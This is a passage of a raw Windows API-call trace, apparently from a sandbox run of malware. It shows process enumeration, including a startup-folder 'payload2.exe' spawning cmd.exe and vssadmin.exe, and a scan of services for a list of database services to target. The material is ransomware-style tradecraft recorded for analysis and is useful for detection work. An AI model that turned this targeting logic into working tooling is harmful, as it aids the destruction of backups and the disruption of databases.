[0046.179] lstrlenW (lpString="svchost.exe") returned 11 [0046.179] Process32NextW (in: hSnapshot=0x218, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0046.179] lstrlenW (lpString="svchost.exe") returned 11 [0046.179] Process32NextW (in: hSnapshot=0x218, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0046.180] lstrlenW (lpString="dwm.exe") returned 7 [0046.180] Process32NextW (in: hSnapshot=0x218, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0046.180] lstrlenW (lpString="explorer.exe") returned 12 [0046.180] Process32NextW (in: hSnapshot=0x218, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0046.181] lstrlenW (lpString="spoolsv.exe") returned 11 [0046.181] Process32NextW (in: hSnapshot=0x218, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0046.182] lstrlenW (lpString="taskhost.exe") returned 12 [0046.182] Process32NextW (in: hSnapshot=0x218, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0046.182] lstrlenW (lpString="svchost.exe") returned 11 [0046.182] Process32NextW (in: hSnapshot=0x218, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0046.183] lstrlenW (lpString="taskeng.exe") returned 11 [0046.183] Process32NextW (in: hSnapshot=0x218, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0046.184] lstrlenW (lpString="taskhost.exe") returned 12 [0046.184] Process32NextW (in: hSnapshot=0x218, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x788, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="challenging.exe")) returned 1 [0046.184] lstrlenW (lpString="challenging.exe") returned 15 [0046.184] Process32NextW (in: hSnapshot=0x218, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pgp prix.exe")) returned 1 [0046.185] lstrlenW (lpString="pgp prix.exe") returned 12 [0046.185] Process32NextW (in: hSnapshot=0x218, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="user-reno.exe")) returned 1 [0046.186] lstrlenW (lpString="user-reno.exe") returned 13 [0046.186] Process32NextW (in: hSnapshot=0x218, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="aggregate.exe")) returned 1 [0046.186] lstrlenW (lpString="aggregate.exe") returned 13 [0046.186] Process32NextW (in: hSnapshot=0x218, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dressed.exe")) returned 1 [0046.187] lstrlenW (lpString="dressed.exe") returned 11 [0046.187] Process32NextW (in: hSnapshot=0x218, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="accounts evaluated jr.exe")) returned 1 [0046.188] lstrlenW (lpString="accounts evaluated jr.exe") returned 25 [0046.188] Process32NextW (in: hSnapshot=0x218, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vulnerability_joined_liechtenstein.exe")) returned 1 [0046.188] lstrlenW (lpString="vulnerability_joined_liechtenstein.exe") returned 38 [0046.188] Process32NextW (in: hSnapshot=0x218, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="developing.exe")) returned 1 [0046.189] lstrlenW (lpString="developing.exe") returned 14 [0046.189] Process32NextW (in: hSnapshot=0x218, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="supported.exe")) returned 1 [0046.189] lstrlenW (lpString="supported.exe") returned 13 [0046.189] Process32NextW (in: hSnapshot=0x218, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="girlstionselect.exe")) returned 1 [0046.190] lstrlenW (lpString="girlstionselect.exe") returned 19 [0046.190] Process32NextW (in: hSnapshot=0x218, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="employedboysdesktop.exe")) returned 1 [0046.191] lstrlenW (lpString="employedboysdesktop.exe") returned 23 [0046.191] Process32NextW (in: hSnapshot=0x218, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="clay_enquiry_thee.exe")) returned 1 [0046.192] lstrlenW (lpString="clay_enquiry_thee.exe") returned 21 [0046.192] Process32NextW (in: hSnapshot=0x218, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="eating.exe")) returned 1 [0046.192] lstrlenW (lpString="eating.exe") returned 10 [0046.192] Process32NextW (in: hSnapshot=0x218, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="nh_protected.exe")) returned 1 [0046.193] lstrlenW (lpString="nh_protected.exe") returned 16 [0046.193] Process32NextW (in: hSnapshot=0x218, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vulnerability.exe")) returned 1 [0046.193] lstrlenW (lpString="vulnerability.exe") returned 17 [0046.193] Process32NextW (in: hSnapshot=0x218, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="incidentoceaneast.exe")) returned 1 [0046.194] lstrlenW (lpString="incidentoceaneast.exe") returned 21 [0046.194] Process32NextW (in: hSnapshot=0x218, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ment_lo_animation.exe")) returned 1 [0046.195] lstrlenW (lpString="ment_lo_animation.exe") returned 21 [0046.195] Process32NextW (in: hSnapshot=0x218, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="counters_config_prostate.exe")) returned 1 [0046.195] lstrlenW (lpString="counters_config_prostate.exe") returned 28 [0046.195] Process32NextW (in: hSnapshot=0x218, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="teethpichuntercrude.exe")) returned 1 [0046.196] lstrlenW (lpString="teethpichuntercrude.exe") returned 23 [0046.196] Process32NextW (in: hSnapshot=0x218, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x814, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0046.197] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0046.197] Process32NextW (in: hSnapshot=0x218, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe")) returned 1 [0046.197] lstrlenW (lpString="cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe") returned 65 [0046.197] Process32NextW (in: hSnapshot=0x218, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x9a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0046.198] lstrlenW (lpString="cmd.exe") returned 7 [0046.198] Process32NextW (in: hSnapshot=0x218, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0046.198] lstrlenW (lpString="conhost.exe") returned 11 [0046.198] Process32NextW (in: hSnapshot=0x218, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x9b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0046.199] lstrlenW (lpString="vssadmin.exe") returned 12 [0046.199] Process32NextW (in: hSnapshot=0x218, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xabc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0046.200] lstrlenW (lpString="VSSVC.exe") returned 9 [0046.200] Process32NextW (in: hSnapshot=0x218, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0046.200] lstrlenW (lpString="svchost.exe") returned 11 [0046.200] Process32NextW (in: hSnapshot=0x218, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0046.201] CloseHandle (hObject=0x218) returned 1 [0046.201] Sleep (dwMilliseconds=0x1f4) [0046.746] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x6803a0 [0046.746] EnumServicesStatusExW (in: hSCManager=0x6803a0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0) returned 0 [0046.746] GetLastError () returned 0xea [0046.746] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x12c6) returned 0x3943b50 [0046.746] EnumServicesStatusExW (in: hSCManager=0x6803a0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3943b50, cbBufSize=0x12c6, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3943b50, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0) returned 1 [0046.747] CloseServiceHandle (hSCObject=0x6803a0) returned 1 [0046.747] lstrlenW (lpString="Appinfo") returned 7 [0046.747] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0046.747] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0046.747] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0046.747] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0046.747] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0046.747] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0046.747] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0046.747] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0046.747] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0046.747] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0046.747] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0046.747] lstrlenW (lpString="AudioSrv") returned 8 [0046.747] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0046.747] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0046.747] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0046.747] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0046.747] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0046.747] lstrlenW (lpString="BFE") returned 3 [0046.748] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0046.748] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0046.748] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0046.748] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0046.748] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0046.748] lstrlenW (lpString="CryptSvc") returned 8 [0046.748] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0046.748] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0046.748] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0046.748] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0046.748] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0046.748] lstrlenW (lpString="CscService") returned 10 [0046.748] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0046.748] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0046.748] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0046.748] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0046.748] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0046.748] lstrlenW (lpString="DcomLaunch") returned 10 [0046.748] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0046.748] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0046.748] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0046.748] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0046.748] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0046.748] lstrlenW (lpString="Dhcp") returned 4 [0046.748] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0046.748] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0046.748] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0046.748] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0046.748] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0046.748] lstrlenW (lpString="Dnscache") returned 8 [0046.748] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0046.748] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0046.748] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0046.748] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0046.748] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0046.748] lstrlenW (lpString="DPS") returned 3 [0046.748] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0046.748] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0046.748] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0046.749] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0046.749] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0046.749] lstrlenW (lpString="eventlog") returned 8 [0046.749] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0046.749] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0046.749] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0046.749] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0046.749] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0046.749] lstrlenW (lpString="EventSystem") returned 11 [0046.749] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0046.749] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0046.749] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0046.749] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0046.749] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0046.749] lstrlenW (lpString="gpsvc") returned 5 [0046.749] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0046.749] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0046.749] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0046.749] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0046.749] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0046.749] lstrlenW (lpString="iphlpsvc") returned 8 [0046.749] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0046.749] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0046.749] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0046.749] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0046.749] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0046.749] lstrlenW (lpString="LanmanServer") returned 12 [0046.749] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0046.749] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0046.749] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0046.749] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0046.749] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0046.749] lstrlenW (lpString="LanmanWorkstation") returned 17 [0046.749] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0046.749] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0046.749] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0046.749] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0046.749] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0046.749] lstrlenW (lpString="lmhosts") returned 7 [0046.750] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0046.750] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0046.750] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0046.750] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0046.750] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0046.750] lstrlenW (lpString="MMCSS") returned 5 [0046.750] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0046.750] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0046.750] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0046.750] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0046.750] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0046.750] lstrlenW (lpString="MpsSvc") returned 6 [0046.750] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0046.750] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0046.750] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0046.750] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0046.750] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0046.750] lstrlenW (lpString="Netman") returned 6 [0046.750] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0046.750] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0046.750] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0046.750] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0046.750] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0046.750] lstrlenW (lpString="netprofm") returned 8 [0046.750] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0046.750] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0046.750] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0046.750] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0046.750] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0046.750] lstrlenW (lpString="NlaSvc") returned 6 [0046.750] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0046.750] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0046.750] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0046.750] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0046.750] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0046.750] lstrlenW (lpString="nsi") returned 3 [0046.750] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0046.750] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0046.750] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0046.750] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0046.751] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0046.751] lstrlenW (lpString="PcaSvc") returned 6 [0046.751] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0046.751] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0046.751] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0046.751] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0046.751] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0046.751] lstrlenW (lpString="PlugPlay") returned 8 [0046.751] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0046.751] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0046.751] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0046.751] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0046.751] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0046.751] lstrlenW (lpString="Power") returned 5 [0046.751] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0046.751] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0046.751] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0046.751] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0046.751] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0046.751] lstrlenW (lpString="ProfSvc") returned 7 [0046.751] 